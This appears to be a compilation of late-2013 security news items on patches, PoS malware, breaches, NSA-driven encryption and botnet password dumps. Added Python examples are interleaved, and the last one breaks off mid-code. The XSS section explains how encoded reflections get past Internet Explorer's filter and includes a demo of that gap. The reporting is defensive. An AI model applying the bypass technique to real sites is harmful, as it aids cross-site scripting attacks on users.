Siemens has patched a serious remotely exploitable vulnerability in its SINAMICS S/G ICS software that could enable an attacker to take arbitrary actions on a vulnerable installation without having to authenticate.
The vulnerability affects all versions of the Siemens SINAMICS S/G products with firmware versions earlier than 4.6.11. ICS-CERT, a part of the Department of Homeland Security, said in an advisory that it is not aware of any public exploit attempts against this flaw, but that’s no reason to delay patching. An authentication bypass vulnerability for a product such as SINAMICS S/G, which is used to control the operations of drives in industrial facilities, could be a very useful tool for an attacker.
“Siemens has identified an authentication bypass vulnerability in the SINAMICS S/G product family. Siemens has produced a firmware update that mitigates this vulnerability and has tested the update to validate that it resolves the vulnerability. Exploitation of this vulnerability could allow an attacker to access administrative functions on the device without authentication,” the ICS-CERT advisory says.
“The affected product, SINAMICS S/G family, is used to control a variety of drives, especially in mechanical engineering and plant construction. In addition, SINAMICS S/G family interacts with motion controllers that are used to coordinate synchronous operations or complex technology functions.”
The vulnerability is considered quite easy to exploit, and Siemens said that organizations that are running vulnerable versions of the software should install the updated firmware, versions 4.6.11 and 4.7. The company also recommends that customers not provide public access to the SINAMICS interface over the network.
“As a general security measure Siemens strongly recommends to protect network access to the interface of SINAMICS S/G with appropriate mechanisms. It is advised to follow recommended security practices and to configure the environment according to operational guidelines in order to run the devices in a protected IT environment,” the Siemens advisory says.
Microsoft will, next week, patch a zero-day vulnerability in its GDI+ graphics component being exploited in targeted attacks in the Middle East and Asia.
The zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its December 2013 Patch Tuesday security updates; five of the bulletins will be rated critical.
Microsoft did confirm, however, that a zero day in the NDProxy driver that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.
The GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.
Tuesday’s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SignalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.
This will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday’s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).
“Regarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,” Kandek said. “We believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.”
The XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.
FireEye researchers said they found the exploit in the wild being used alongside a PDF-based exploit against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected; later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as installing new software, manipulating data, or creating new accounts. The exploit cannot be used remotely, the company said.
Microsoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.
“System administrators everywhere must have made Microsoft’s naughty list because this holiday ‘gift’ is clearly a lump of coal,” said Tyler Reguly, technical manager of security research and development at Tripwire. “Microsoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.”
The pesky Dexter point-of-sale malware, discovered more than a year ago, remains active primarily in Russia, the Middle East and Southeast Asia, while its cousin Project Hook is finding similar success in the United States, prompting experts to sound an alarm as holiday commerce ramps up.
Researchers at Arbor Networks last month found two servers hosting the Windows-based malware, heralding newly active campaigns.
Dexter and Project Hook differ from more traditional point-of-sale attacks which rely on skimmers physically installed on endpoints, or phishing emails luring users on Windows machines hosting the PoS software. Instead, the malware is injected into files hosted on Windows servers before scraping credit card numbers as they’re entered via the PoS system.
Arbor Networks senior research analyst Curt Wilson said the two new Dexter servers were found in November; law enforcement as well as the Financial Services Information Sharing and Analysis Center (FS-ISAC) were informed. Wilson said during a two-week period when Arbor researchers were monitoring activity on the servers, they saw 533 infected endpoints call back to the command and control infrastructure.
“The way the attackers had the server set up, we saw credit card data posted to the site,” Wilson said. “The attackers were clearing the log files periodically, so there’s no telling how long these campaigns have been ongoing.”
Arbor identified three versions of Dexter: Stardust, which is likely the original version; Millenium; and Revelation. Revelation is likely the latest version and it is capable of moving stolen data not only over HTTP as previous versions, but also over FTP, a first for POS malware, Wilson said. Wilson added that Arbor researchers have not been able to determine how the initial infections are happening. The two command servers, he said, are no longer online.
Dexter was discovered more than a year ago and reported by researchers at Seculert, who reported at the time that campaigns were claiming victims at big retail operations, hotels and restaurants. At the time there were victims in 40 countries, most of those in the U.S. and the United Kingdom.
“Dexter is stealing the process list from the infected machine, while parsing memory dumps of specific POS software related processes, looking for Track 1 / Track 2 credit card data,” Seculert CTO Aviv Raff wrote in a blogpost last December. “This data will most likely be used by cybercriminals to clone credit cards that were used in the targeted POS system.”
Point-of-sale systems present hackers with a target-rich environment. The systems are often reachable online and are usually guarded with default or weak passwords that are child’s play for a brute force or dictionary attack. The last two Verizon Data Breach Investigations Reports have identified small retailers and hospitality providers as the primary victims in such opportunistic attacks because of limited security resources.
Wilson said some of the victimized machines were not dedicated PoS servers; one in particular was also hosting a physical security management system that ran access control and card reader software.
“The data being exfiltrated that we’ve seen suggests that the compromised machines are doubling up functions and running point of sale on a machine doing something else. PoS machines should be dedicated, locked down and have special policies applied to them,” Wilson said. “That’s a bad practice to pile so much on one system. An attacker with access to credit card data would also have access to anything else the management system has access to.”
Wilson said that the initial infections could be happening either via phishing emails luring victims to sites hosting Dexter or Project Hook, or the attackers are taking advantage of default credentials to access these systems remotely.
“With the holidays, there’s going to be more PoS activity and a higher volume of transactions. Now would be a good time to fortify security,” Wilson said. “The basics should cover this. There are IDS signatures written for this malware, and there are indicators of compromise floating around; basic antimalware should catch the process-injection techniques used here.”
Meanwhile, Ars Technica reported today the discovery of the first botnet targeting point-of-sale systems. A Los Angeles security company called IntelCrawler found the botnet which had infected close to 150 Subway sandwich shops stealing 146,000 credit card numbers.
An attack on the computer networks of banking giant JP Morgan Chase & Co. may have exposed sensitive information belonging to 465,000 prepaid cash-card holders, according to a Reuters report.
JP Morgan said the attack targeted Web servers handling its UCard program in mid-September and that the company has since remedied the underlying flaws that led to the breach and contacted law enforcement. The bank admitted to Reuters that attackers pilfered “a small amount” of data, but that they believe no user Social Security numbers, dates of birth, or email addresses were taken.
Troublingly, the Reuters report indicates that the information potentially exposed was not encrypted at the time of the attack, though JP Morgan claims it generally does encrypt its customers’ personal information.
Company spokesperson Michael Fusco told Reuters that JP Morgan spent the months following the attack determining which customers may have been affected and which data may have been compromised. The company is contacting those customers. He reportedly declined to disclose any technical details of the attack.
The breach reportedly affected some two percent of JP Morgan’s 25 million UCard holders, according to Fusco. Corporations apparently buy UCards from JP Morgan and issue them as payments to their employees while government agencies use them to issue tax refunds and to pay unemployment and other benefits.
As is standard operating procedure at this point, the bank is offering three years of credit monitoring services to those affected.
In response to the growing set of revelations about the NSA’s surveillance methods and alleged compromise of some large technology vendors’ services, Microsoft is taking a number of steps to try and reassure customers about the integrity of the company’s offerings and to greatly expand the use of encryption across its services.
Microsoft said that in the next few months it will be improving and expanding its use of encryption, specifically in its cloud services such as Azure, Outlook.com and Office 365. The company recently announced that it would be improving the encryption services on Office 365, but this new initiative goes well beyond that effort. Microsoft will be implementing Perfect Forward Secrecy on its cloud service and also will be moving to 2048-bit keys. This applies to data in transit between customers and Microsoft’s servers, but it also will be applied to information moving among the company’s data centers.
Microsoft said that these new security measures will be in place by the end of 2014, and some of them are in effect right now. The company also will be encrypting customer data at rest in its data centers.
“Although this is a significant engineering effort given the large number of services we offer and the hundreds of millions of customers we serve, we’re committed to moving quickly. In fact, many of our services already benefit from strong encryption in all or part of the lifecycle. For example, Office 365 and Outlook.com customer content is already encrypted when traveling between customers and Microsoft, and most Office 365 workloads as well as Windows Azure storage are now encrypted in transit between our data centers. In other areas we’re accelerating plans to provide encryption,” Brad Smith, general counsel and executive vice president for legal and corporate affairs at Microsoft said.
Microsoft officials, like their counterparts at Google, Yahoo, Apple and other tech giants, have spent much of the last six months dealing with a number of allegations in media reports of the Edward Snowden NSA leaks. The most damaging reports have alleged that these companies have provided direct access to their servers for the NSA, something all of them have denied. Recent revelations have shown that the agency is actually tapping into undersea fiber cables that move generally unencrypted data between data centers around the world. This revelation has angered engineers at Google and led the company to accelerate some of its existing plans to encrypt those data links.
While Microsoft’s moves to encrypt more customer data will provide better protection for customers, there is more that the company could be doing to give basic security to its millions of users, said Chris Soghoian, principal technologist at the American Civil Liberties Union. Soghoian has been urging Microsoft and other companies to turn on SSL by default on their Web properties for years and said that there a number of outstanding issues Microsoft needs to resolve to make these moves more significant.
“Bing still doesn’t offer SSL as an option. So will they finally change that? One of the things they said in this announcement is that they’ll be using best-in-class encryption, but that means more than just an algorithm. It means things like HSTS [HTTP Strict Transport Security] and certificate pinning,” he said. “Is Microsoft going to use certificate pinning in Internet Explorer?”
Certificate pinning allows browsers to define which certificate is associated with a specific Web property, as a defense against man-in-the-middle attacks that employ spoofed certificates. HSTS is a header that tells users’ clients that a given Web server only wants to accept secure connections.
In addition to the encryption changes, Microsoft also said it will be reinforcing the legal authorities that it uses to protect customer data that the company stores. The company notifies corporate and government customers when it receives a request for a customer’s data, and Smith said Microsoft will continue to do this in the future.
“Except in the most limited circumstances, we believe that government agencies can go directly to business customers or government customers for information or data about one of their employees – just as they did before these customers moved to the cloud – without undermining their investigation or national security. And when those limited circumstances arise, courts should have the opportunity to review the question and issue a decision,” Smith said.
But, Soghoian questioned why these same protections aren’t being extended to individual consumers whose data the government may seek.
“What about their regular customers? Forcing a gag order forces the government to go before a judge on something that they wouldn’t have to otherwise,” he said. “It’s really helpful to force the issue before an independent third party.”
Smith said Microsoft also plans to open so-called transparency centers in several locations around the world to enable government customers to inspect Microsoft’s source code for backdoors. The company has been allowing limited access to its source code for several years now, but will be expanding that in the near future.
“We’re therefore taking additional steps to increase transparency by building on our long-standing program that provides government customers with an appropriate ability to review our source code, reassure themselves of its integrity, and confirm there are no back doors. We will open a network of transparency centers that will provide these customers with even greater ability to assure themselves of the integrity of Microsoft’s products,” Smith said.
UPDATE – A weakness has been discovered in the reflective cross-site scripting filter present in Internet Explorer since IE 8 that could enable an attacker to trick the browser into executing malicious code as trusted. The problem going forward is twofold: everything occurring in the bypass method is accepted as part of the official HTML standard going back at least 15 years; and Microsoft said it will not work on a fix for the flaw.
Carlos Munoz, a researcher with WhiteHat Security who publicized the issue today, told Threatpost that he reported the problem to the Microsoft Security Response Center on Aug. 26 and after several back-and-forth emails was informed that Microsoft would not move forward citing its design philosophy for the XSS filter.
A Microsoft spokesperson told Threatpost that the filter was designed with the goal of raising the cost of an attack.
“As such, and after thorough investigation, this is not a product vulnerability,” the spokesperson said. “The scenario in question would require a cross-site scripting vulnerability to be present in a website and would also require a user to interact with such a site. We continue to recommend that customers exercise caution when accepting links from untrusted sources.”
In its email exchanges with Munoz, Microsoft pointed the researcher to a bullet point in its design philosophy that states: “For attacks that depend on application-specific transformations, we will only attempt to make the XSS Filter effective where these transformations are identified to be pervasive. We choose not to ROT13 decode URLs.”
Munoz said that if Microsoft did choose to fix the problem, it may have to add functionality to the filter that recognizes encoded reflections, decodes them, and then compares those decodings to known potentially malicious signatures.
“Another path that Microsoft could take is tracking injections across several requests and attempting to determine if an injection on page 1 of a website eventually reflects as a malicious script on page 4,” Munoz said. “There are probably several other avenues that Microsoft could pursue in working on a fix for this flaw.”
Microsoft introduced the reflective cross-site scripting filter in Internet Explorer 8 and it’s been supported in every version of the browser through the current version 11 released two months ago with Windows 8.1. The filter prevents browsers from executing non-stored data submitted in an HTML form or in an HTTP query without sanitizing it first.
“Currently this method of bypassing Internet Explorer’s anti-XSS filter only works when an attacker can inject into or create their own attribute space of an HTML element, and that attribute is then passed onto a page within the same domain that contains a XSS vulnerability,” Munoz said. “As this would imply, this is not an ‘everything is vulnerable’ type of finding. It is, however, something that could be exploited on almost any page where an attacker can inject HTML elements, albeit with the requirement that the victim would need to click a link on the page.”
Munoz wrote in a blog post today that the filter compares only untrusted requests with the response body from a website for reflections that could cause code execution.
Munoz points out that the filter is effective at stopping cross-site scripting attacks, but an attacker could fool it by taking advantage of a loophole in the HTML standard with regard to decimal and hexadecimal encodings.
“Everything utilized in this methodology is part of the official HTML standard—it uses the web the way the web was meant to be used,” Munoz said. When a response is made to an HTTP request that includes a properly coded decimal or hexadecimal character, Munoz said, the browser will display the encoded character.
“As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character,” Munoz wrote. “Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.”
Munoz said such an attack can be carried out with a malicious iframe, malicious code in a form submission or an embedded link to a site hosting an exploit. He added that he is not aware of any in-the-wild exploits. An attacker could craft something similar to a common reflective XSS attack to bypass the filter, but would have to entice the user via a phishing email to land on a site hosting an exploit.
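The encoded-reflection behaviour Munoz describes, and the decode-then-compare check he suggests a filter would need, as an added Python example (not code from Munoz, WhiteHat or Microsoft). The `<probe>` input, the response body and the function names are constructed for the illustration, and the decoder is a simplified one covering only the decimal and hexadecimal references the article names.

```python
import re

# Numeric character references as HTML defines them: "&#60;" (decimal) and
# "&#x3c;" / "&#X3C;" (hexadecimal). Browsers tolerate a missing trailing
# semicolon inside attribute values, so the pattern makes it optional.
# Simplified decoder for the two forms named in the article: it does not
# handle named references or HTML5's special-case code points.
_NUMERIC_REF = re.compile(r"&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?")


def decode_numeric_refs(value: str) -> str:
    """Replace decimal and hexadecimal character references with the characters they denote."""
    def repl(match):
        hex_digits, dec_digits = match.groups()
        code = int(hex_digits, 16) if hex_digits is not None else int(dec_digits)
        try:
            return chr(code)
        except (ValueError, OverflowError):
            return match.group(0)  # out-of-range reference: leave the text as it was
    return _NUMERIC_REF.sub(repl, value)


def attribute_value_as_submitted(attribute_value: str) -> str:
    """What the browser sends when a form field's value attribute is submitted:
    the decoded characters, not the references that appeared in the markup."""
    return decode_numeric_refs(attribute_value)


def literal_reflection_check(untrusted: str, response_body: str) -> bool:
    """Filter logic that compares the raw untrusted input with the response body.
    It sees no reflection when the server echoed the input in encoded form."""
    return untrusted in response_body


def normalized_reflection_check(untrusted: str, response_body: str) -> bool:
    """Decode numeric references on both sides before comparing, so an input
    that comes back encoded inside an attribute is still recognised as reflected."""
    return decode_numeric_refs(untrusted) in decode_numeric_refs(response_body)


# Constructed sample: a neutral probe containing markup-significant characters,
# and a page-1 response that echoes it, encoded, into a hidden field that will
# be submitted to a later page on the same site.
UNTRUSTED_INPUT = "<probe>"
ENCODED_FIELD_VALUE = "&#x3c;probe&#x3e;"
RESPONSE_BODY = (
    '<form action="/page4"><input type="hidden" name="q" '
    'value="' + ENCODED_FIELD_VALUE + '"></form>'
)


def demo() -> dict:
    """Run both checks over the constructed sample and show what the next page receives."""
    return {
        "literal_check_sees_reflection": literal_reflection_check(UNTRUSTED_INPUT, RESPONSE_BODY),
        "normalized_check_sees_reflection": normalized_reflection_check(UNTRUSTED_INPUT, RESPONSE_BODY),
        "value_sent_to_next_page": attribute_value_as_submitted(ENCODED_FIELD_VALUE),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val!r}")
```

The literal comparison reports no reflection while the decoded value the browser will actually submit to the next page is the original markup, which is the gap the decode-then-compare check closes.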
This article was updated Dec. 5 with a comment from a Microsoft spokesperson.
In an attempt to curb the rampancy of fraud throughout the holiday shopping season, a coalition of international law enforcement agencies seized 706 Internet domains allegedly involved in the sale of counterfeit merchandise.
The United States Homeland Security Investigations’ (HSI) National Intellectual Property Rights (IPR) Coordination Center spearheaded the operation along with Immigration and Customs Enforcement and ten law enforcement agencies from other countries and the European Union as well.
The campaign – dubbed Project Cyber Monday IV – is in its fourth year and is part of the ICE’s ongoing Operation in our Sites.
Among the domains seized, 297 were based in the U.S. and taken down by HSI, 393 were located inside the EU and taken down by Europol, and Hong Kong law enforcement took down 16 domains under its jurisdiction.
In a press release announcing the seizures on the ICE’s website, the agency claims that the last few weeks of the calendar year see online and physical marketplaces flooded with counterfeit goods. The negative impact of this, they claim, is two-fold: scammers are duping buyers with shoddy goods and consumers are putting their financial information at risk by purchasing from counterfeiters.
“Working with our international partners on operations like this shows the true global impact of IP crime,” said ICE Acting Director John Sandweg. “Counterfeiters take advantage of the holiday season and sell cheap fakes to unsuspecting consumers everywhere. Consumers need to protect themselves, their families, and their personal financial information from the criminal networks operating these bogus sites.”
The ICE didn’t mention it but, of course, counterfeit goods affect the bottom lines of businesses as well. In fact, the IPR Center notes that the majority of the information it received leading to takedowns came from the trademark holders that were being infringed upon.
The IPR center claims that the most commonly counterfeited goods are headphones, sports jerseys, personal care products, shoes, toys, luxury goods, cell phones, and electronic accessories. Law enforcement officials would buy these items undercover and verify that they were in fact counterfeits with the legitimate trademark and copyright holders before moving on domain seizures.
“This operation is another good example of how transatlantic law enforcement cooperation works. It sends a signal to criminals that they should not feel safe anywhere,” said Rob Wainwright, director of Europol. “Unfortunately the economic downturn has meant that disposable income has gone down, which may tempt more people to buy products for prices that are too good to be true. Consumers should realize that, by buying these products, they risk supporting organized crime.”
All of the domain names seized are under the control of the governments involved in the operation. Visitors to those sites will see a banner informing them of why the site has been taken offline and warning them that willful copyright infringement is a violation of federal law.
Virtualization software company VMware pushed out patches for some builds of its Workstation, Fusion, ESXi and ESX products this week, fixing a vulnerability that could have led to a privilege escalation in older Windows operating systems running in a virtual environment.
The main problem is the way that Workstation, ESX and Fusion handle control code in the LGTOSYNC.sys driver. If an attacker leveraged a vulnerability in that driver they could manipulate memory allocation and put users running the software on 32-bit systems running Windows 2000 Server, Windows XP or Windows 2003 at risk. ESXi is tangentially vulnerable if deployed on Windows 2000 Server, Windows XP or Windows 2003 Server.
“The vulnerability does not allow for privilege escalation from the Guest Operating System to the host,” VMware specified in an advisory yesterday, “This means that host memory can not be manipulated from the Guest Operating System.”
The security advisory adds that versions of Workstation from 9.x prior to 9.0.3, Player from 5.x prior to 5.0.3, Fusion from 5.x to 5.0.4, ESXi 4.0, 4.1, 5.0, 5.1 and ESX 4.0 and 4.1 are all affected.
All of the vulnerable products are more or less part of the company’s VMware infrastructure suite. VMware Fusion is technically referred to as a software hypervisor, allowing Intel-based Macs to run Windows, Linux and other operating systems alongside OS X while Workstation has the same functionality as Fusion, it’s just specialized for x64 computers running Windows, Linux or BSD.
It’s the second privilege escalation vulnerability patched by VMware in the past three weeks. The company also fixed a similar issue in Workstation, in particular the version that runs Linux, back in November.
VMware posted patches for all of the products implicated yesterday on the support section of its site and, per usual, sent security notifications via email and in a post to the Full Disclosure list.
Although there are still a number of issues that need to be addressed with the Department of Homeland Security’s information security efforts, the department is improving in many areas and making strong progress toward implementing better security controls, a new report from the Inspector General found.
DHS, which is responsible for a large portion of the security programs in the federal government, has been criticized sharply in the past for not meeting minimum standards on various basic security controls. The IG, as well as members of Congress, have taken the department to task for falling behind on requirements such as patching, implementing strong authentication and exerting better control of external systems. The latest report from the Office of the Inspector General shows that the department is moving in the right direction on many things, but still has plenty of room for improvement.
The report shows that some portions of DHS are running systems with authority to operate, haven’t consolidated all of their Internet connections into one trusted Internet connection and don’t have a formal process for tracking external systems.
“We identified a number of issues that DHS needs to address to strengthen its security posture. For example, we determined that components are not satisfying all of the Department’s information security policies, procedures, and practices. Specifically, we identified deficiencies in component POA&M [plan of action and milestones] management, system security authorization, and the consolidation of external network connections. In addition, components have not implemented all system configurations in accordance with DHS policies and procedures,” the new report says.
One major problem that the IG found in the DHS program, which has been ongoing for at least a year, is the department’s lack of a management program for tracking security vulnerabilities in its classified systems. The department uses a project management system to track progress on most such initiatives, but the IG found this wasn’t the case for vulnerabilities in classified systems.
“DHS does not monitor the adequacy of the POA&Ms for its ‘Top Secret’ systems. For example, DHS has yet to perform any reviews or oversight functions on ‘Top Secret’ POA&Ms that are manually tracked outside of the Department’s enterprise management tools. As a result, DHS cannot ensure that POA&Ms have been created to mitigate the security vulnerabilities identified on its ‘Top Secret’ systems and ensure they are managed in accordance with DHS’ policies and procedures,” the report says.
A second issue is that DHS doesn’t have baseline configurations enforced on its systems, both on the desktop and servers. The IG report found inconsistent implementation of the configurations and recommended that the department’s CIO ensure that this state of affairs changes. DHS management, commenting on the IG’s recommendations, said that it plans to have this problem addressed by the end of the year.
“During FY 2013, DHS completed major steps toward achieving this goal. There are 11 out of 12 Components now using the approved baseline configuration settings. The rigor of configuration management will be increased in FY 2014 by expanding relevant scorecard metrics to include devices beyond Windows platforms,” the comment said.
Overall, the IG report said that DHS is moving forward with its security programs and making strides toward hardening the department’s internal and external systems.
“DHS continues to improve and strengthen its information security program. During the past year, DHS drafted an ongoing authorization methodology to help improve the security of the Department’s information systems through a new risk management approach. This revised approach transitions the Department from a static, paperwork-driven, security authorization process to a dynamic framework that can provide security-related information on demand to make risk-based decisions based on frequent updates to security plans, security assessment reports, and hardware and software inventories,” the report says.
So what’s worse: Finding two million passwords harvested by a botnet, or learning that most of the stolen passwords are terribly weak?
Researchers at Trustwave found another Pony botnet controller recently that oversees a trove of close to two million website logins, email account credentials, as well as FTP, RDP and SSH accounts. Most of the account credentials found were for online services such as Facebook, Google, Twitter, Yahoo and LinkedIn, as well as close to 8,000 passwords for the ADP payroll service.
While the Facebook logins found inside this particular Pony instance are useful for social engineering capers, phishing scams and targeted attacks, the ADP logins are a link to cold hard cash.
“It is only natural to have such domains in the mix, but it is surprising to see it ranked #9 on the top domains list,” wrote Trustwave SpiderLabs researchers Daniel Chechik and Anat Davidi. “Facebook accounts are a nice catch for cyber criminals, but payroll services accounts could actually have direct financial repercussions.”
Pony is a botnet control panel: a web management interface that gives the operator a view of infected victims, activity logs, the stolen data and statistics on that data. Since the Pony controller source code leaked earlier this year, researchers have been finding more instances of it online, used to manage botnets big and small.
This particular instance discovered by SpiderLabs has a distinct Russian flavor, since a good number of credentials for a couple of popular Russian social networks were also recovered. Infected machines from more than 100 countries report in to this Pony controller. According to the stats SpiderLabs found, most of those connections arrive from a single IP address in the Netherlands, which leads the researchers to theorize that the Dutch host is not the real command-and-control server but a gateway standing between the infected machines and the true infrastructure.
“This technique of using a reverse proxy is commonly used by attackers in order to prevent the Command-and-Control server from being discovered and shut down—outgoing traffic from an infected machine only shows a connection to the proxy server, which is easily replaceable in case it is taken down,” Chechik and Davidi wrote. “While this behavior is interesting in-and-of itself, it does prevent us from learning more about the targeted countries in this attack, if there were any.”
While the theft of credentials is bad enough (318,121 Facebook credentials; 59,549 Yahoo; 54,437 Google), the researchers looked at the passwords themselves and perhaps not to anyone’s surprise, they’re generally weakly constructed credentials.
Hundreds of thousands of credentials, the researchers said, use only one character type—either numerals or letters—as a password. Most of those are built off the 123456 construct; seven of the top 10 passwords found via the controller started with 123. Password, admin and 111111 round out the top 10.
As for complexity, 34 percent were rated poor by SpiderLabs, meaning they used only one character type or were a simple, common password, while 22 percent were rated good or excellent, meaning they used at least three different character types.
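The rating described above comes down to counting character classes. The following is an added example, not SpiderLabs' code: it rates a constructed list of passwords by how many of the four classes (lower, upper, digit, symbol) each uses, summarizes the shares per tier, and checks how many of the top ten start with "123". The tier boundaries and the rule that "excellent" also needs eight or more characters are my assumptions, not the published SpiderLabs scheme.

```python
"""Rate passwords from a credential dump by character-class diversity.

Added example, not SpiderLabs' code. Tiers follow the article's description
(one class = poor, three or more = good/excellent); the exact boundaries and
the "excellent needs 8+ chars" rule are assumptions made here.
"""
from collections import Counter
import string

# Constructed sample dump, not data recovered from the Pony controller.
SAMPLE_PASSWORDS = [
    "123456", "123456789", "1234", "password", "12345", "12345678",
    "admin", "123", "1", "1234567", "111111", "qwerty", "Summer2013",
    "P@ssw0rd!", "correcthorse", "Tr0ub4dor&3", "abcdef", "123abc",
]


def character_classes(pw: str) -> int:
    """Count how many of lower/upper/digit/symbol classes the password uses."""
    classes = (string.ascii_lowercase, string.ascii_uppercase, string.digits)
    count = sum(any(c in cls for c in pw) for cls in classes)
    if any(c not in string.ascii_letters + string.digits for c in pw):
        count += 1  # anything outside letters and digits counts as a symbol
    return count


def rate(pw: str) -> str:
    """Map a password to poor / medium / good / excellent (assumed tiers)."""
    n = character_classes(pw)
    if n <= 1:
        return "poor"
    if n == 2:
        return "medium"
    if n == 3 or len(pw) < 8:
        return "good"
    return "excellent"


def summarize(passwords):
    """Return (share per tier in percent, top-10 passwords, how many of them start with '123')."""
    total = len(passwords)
    tiers = Counter(rate(p) for p in passwords)
    shares = {tier: round(100 * n / total) for tier, n in tiers.items()}
    top = Counter(passwords).most_common(10)
    prefix_123 = sum(1 for pw, _ in top if pw.startswith("123"))
    return shares, top, prefix_123


if __name__ == "__main__":
    shares, top, n123 = summarize(SAMPLE_PASSWORDS)
    print(shares)
    print(f"{n123} of the top {len(top)} start with 123")
```

Run over a real dump, the interesting number is not the share of "poor" passwords but how few distinct strings account for most of the accounts; `most_common` is what exposes that.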
“Unfortunately, the most commonly used passwords were far from what your CISO would like to see,” they wrote.
In order for the National Security Agency to collect the massive amounts of communication it has from email and Web traffic, it needs to elude, leapfrog or bash through the barrier that is SSL.
How it’s doing so is the real question, one that noted Johns Hopkins cryptographer Matthew Green wants answered.
“If you really want to collect that kind of information, that means email and web traffic,” Green said. “Those are the most vulnerable things on the Internet and those are secured with SSL.”
Green published a lengthy essay yesterday that proposed a number of practical and elaborate scenarios explaining how SSL could be subverted or suborned. He also suggests that there’s no time like the present to get away from RSA keys and consider alternatives such as perfect forward secrecy and even Elliptic Curve Cryptography.
Some large Internet companies reportedly targeted by the NSA have already taken steps to either encrypt traffic by default, strengthen the keys they use to secure communication, or move away entirely from broken or weakened algorithms. Google, for example, has recently announced it has completed, ahead of schedule, an upgrade of its SSL certificates to 2048-bit RSA and Microsoft announced that it was advising developers to deprecate the RC4 algorithm and stop using the SHA-1 hash algorithm.
The moves are encouraging, but they’re initial steps toward keeping the NSA’s surveillance efforts at bay and securing the privacy of consumers and enterprises alike. Green, for one, says Perfect Forward Secrecy should be considered a minimum standard going forward.
“The other thing that we need to do is start moving away from RSA altogether. Right now there are a few companies such as Google, Facebook and Twitter that have all adopted Perfect Forward Secrecy, but people still view that as a luxury,” Green said. “I think that’s the basic, minimum requirement right now.”
Perfect Forward Secrecy removes the single point of failure that a server’s long-term SSL key represents: each connection negotiates its own ephemeral session key, which is discarded once the connection is shut down. In the classic TLS RSA handshake, by contrast, the client encrypts the session secret to the server’s one long-term RSA public key (typically 1024 or 2048 bits), so whoever obtains that private key can decrypt every past and future connection to the server. Cryptography experts believe that, despite the extra computation it requires, Perfect Forward Secrecy is the better option.
“It’s this one piece of information that every single piece of data that’s come over the wire is vulnerable to if that gets compromised. You can go back five years and decrypt what people sent five years ago,” Green said. “If it works right, you have one key, use it and you erase it.”
Modern browsers such as Internet Explorer, Chrome and Firefox already support Perfect Forward Secrecy, but this doesn’t help those users still on older versions of IE for example, a browser that is also a favorite of hackers in targeted attacks, and is still being patched almost monthly by Microsoft.
“The problem is when people are using IE 6 and 7, [those browsers don't] support this. You still have to support RSA; it just ends up being a mess,” Green said. “The good news is it can support people using modern browsers, but we’re never going to be able to help you if you’re using older browsers.”
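What "adopting Perfect Forward Secrecy" means on the server side is refusing to negotiate static RSA key transport. The following is an added example, not from the article or from Green's essay: it builds a server-side TLS context with Python's standard-library ssl module that only offers (EC)DHE and TLS 1.3 suites, drops RC4 and MD5, and audits the resulting cipher list for anything a leaked long-term key could still decrypt. The cipher string is my choice and must be re-validated against the deployed OpenSSL build.

```python
"""Configure a server-side TLS context so every negotiable suite has forward
secrecy, and audit the result.

Added example, not code from the article or from Green's essay. Standard
library only; the cipher string is an assumption to be checked against the
deployed OpenSSL build.
"""
import ssl

# RSA (or ECDSA) for authentication, (EC)DHE for key exchange; TLS 1.3 suites
# are always ephemeral. Static RSA key transport (kRSA), anonymous suites,
# RC4 and MD5 are excluded explicitly.
PFS_CIPHER_STRING = "ECDHE+AESGCM:DHE+AESGCM:!aNULL:!RC4:!MD5:!kRSA"


def forward_secret(cipher_name: str) -> bool:
    """Judge a suite by its OpenSSL name: static-RSA suites carry no DHE/ECDHE prefix."""
    return cipher_name.startswith(("ECDHE-", "DHE-", "TLS_"))


def hardened_context() -> ssl.SSLContext:
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers(PFS_CIPHER_STRING)
    return ctx


def negotiable_cipher_names(ctx: ssl.SSLContext) -> list:
    return [c["name"] for c in ctx.get_ciphers()]


def audit(ctx: ssl.SSLContext) -> list:
    """Suites that would let a leaked long-term key decrypt recorded traffic, or use RC4."""
    return [n for n in negotiable_cipher_names(ctx)
            if not forward_secret(n) or "RC4" in n]


def static_rsa_context():
    """The weak configuration, for contrast: static RSA key transport only.

    Returns None when the local OpenSSL build has no such suites left.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2  # TLS 1.3 would add ephemeral suites
    try:
        ctx.set_ciphers("kRSA+AES")
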